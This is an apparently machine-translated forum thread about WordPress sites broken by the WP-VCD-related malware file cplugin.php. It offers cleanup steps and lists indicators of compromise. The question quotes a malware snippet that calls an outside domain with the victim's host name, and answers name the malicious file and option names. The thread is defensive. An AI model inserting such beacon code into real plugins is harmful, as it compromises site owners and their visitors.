WordPress网站500错误和中断由于cplugin.php文件恶意软件

jm81lzqq  于 2023-10-17  发布在  WordPress
关注(0)|答案(6)|浏览(170)

最近有一次攻击,许多WordPress网站由于一个文件cplugin.php而被关闭,这是一个恶意软件。
该恶意软件是糟糕的编写代码,所以现在它主要是造成500服务器运行时错误。但最好立即删除它,因为它迁移到服务器上的所有多个网站,并有代码击中恶意软件的网址下载额外的文件。恶意软件代码片段:

if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}

我已经想出了一个解决方案,并张贴自己的答案,以帮助所有用户在那里。
编辑:
有报告称,同一个文件对用户的命名不同:ccode.php, cplugin.phphelad.php,在这种情况下,可以修改修复。

xoefb8l8

xoefb8l81#

这不是攻击,但恶意软件包含无效插件或主题您下载并安装自己.它是WP-VCD的更新版本- WordFence有一个白皮书,其中包含WP-VCD: The Malware You Installed On Your Own Site中的所有细节,也许我们应该称之为“WP-VCD扩展”:)
妥协的指标是名为ccode.phpcplugin.phphelad.phpmplugin.php(和admin_ips.txt)的插件文件在wp-content/plugins和插件/主题文件夹中的class.plugin-modules.phpclass.theme-modules.php

打扫

1.在class.plugin-modules.phpclass.theme-modules.php中找到带有恶意软件的插件或主题,并删除该插件或主题(如果您需要-从官方来源购买)。
1.删除恶意软件插件:ccode.phpcplugin.phphelad.phpmplugin.php
1.重复它的所有网站在同一托管帐户/服务器。
安装过程似乎确实触及wp-includes/functions.php,但它只试图删除恶意软件,所以这可能是从以前的恶意软件版本升级的一部分。

wz8daaqr

wz8daaqr2#

这看起来像是某种全球性的攻击在plugins文件夹中有一个文件cplugin.php,它导致了网站的宕机。删除该文件是没有用的,因为它重新出现。它也会感染多网站服务器上的所有其他网站。幸运的是,经过几个小时的工作,已经找到了解决办法。请仔细阅读此内容以修复您的网站:
1.备份您的数据库和文件
1.编辑你的wp_options表,找到属性active_plugins并编辑它,你会看到它有一个cplugin.php的插件条目。我们得删除它。您的初始数据看起来像这样:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
编辑这个以删除cplugin.php条目,从i开始到下一个;并删除它。(确保你的数据库备份,以防你犯了一些错误)。没有cplugin.php的新条目看起来像:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
1.对wp_option表中名为site_transient_update_plugins的字段执行类似的步骤
前:O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....
后:O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....
1.更新字段后,导航回主插件文件夹/wp-content/plugins并删除文件cplugin.php
1.登录到您的WordPress Jmeter 板并重新激活所有插件
你已经修复了你的网站。
我认为技术原因是恶意软件将自己注册为wordpress插件,在删除时自动替换文件。幸运的是,恶意软件是写得很糟糕的代码,所以不是运行它主要抛出500 error。但无论如何,我会建议立即删除它,以防它更新。
编辑:根据这个topic上的wordpress论坛线程,对于一些用户来说,简单地重命名文件也可以使网站正常工作,这可能是因为在wordpress中重命名文件会停用插件,因为网站开始工作。但我不会让受感染的文件重命名和存储在任何情况下,所以会建议第一个解决方案后,至少获得访问该网站.

4ktjp1zp

4ktjp1zp3#

另一种方法来解决这个问题在3个步骤:
1.删除恶意插件通过此请求创建的wp_option中的所有条目:
wp_options搜索WHERE option_name =“ip_admin”OR option_name=“ad_code”OR option_name=“cookies_admin”OR option_name =“logged_admin”OR option_name=“hide_admin”OR option_name =“hide_logged_in”OR option_name=“display_ad”OR option_name=“search_engines”OR option_name=“auto_update”OR option_name=“log_install”
1.识别在 /wp-content/plugins 目录(Linux OS上的 ls -lrtha)中创建的野生插件文件,将其删除并创建一个指向 /dev/null 的符号链接,使用此名称,该文件从未正确创建过。命令行来执行此操作(在Linux上):
ln -s /dev/null mplugin.php
1.可选的,但只是为了避免错误日志中的任何噪音,从 wp_options 表中删除 * nameplugin.php *,其中option_name = _site_transient_update_plugins。

brjng4g3

brjng4g34#

在我们网站的数据库中没有条目,但调用代码被添加到wp-includes文件夹中functions.php的底部。删除违规呼叫和网站弹出的权利。:)

bvuwiixz

bvuwiixz5#

在名为cplugin.phphelad.php的wp-content文件夹文件中,在这种情况下可以修改修复。立即删除它,因为它迁移到服务器上的所有多个网站,并有代码击中恶意软件URL下载其他文件。

13z8s7eq

13z8s7eq6#

您使用了主题或插件null。

相关问题